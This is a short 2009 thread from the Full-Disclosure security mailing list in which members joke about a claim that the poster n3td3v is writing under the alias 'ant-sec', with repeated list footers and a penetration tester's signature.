I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong
On Thu, Jul 16, 2009 at 1:35 PM, Benjamin
Cance wrote:
> now we know who antisec are/is, i'm going to bed
>
> Charles Majola wrote:
>> HAH!
>>
>> I knew it
>>
>> On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote:
>>
>>> careful. n3td3v has found his way back onto the list. he is now
>>> posting as ant-sec. he is hacking and spreading disinformation on
>>> full-d.
>>>
>>> careful who you talk 2, he has many names.
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
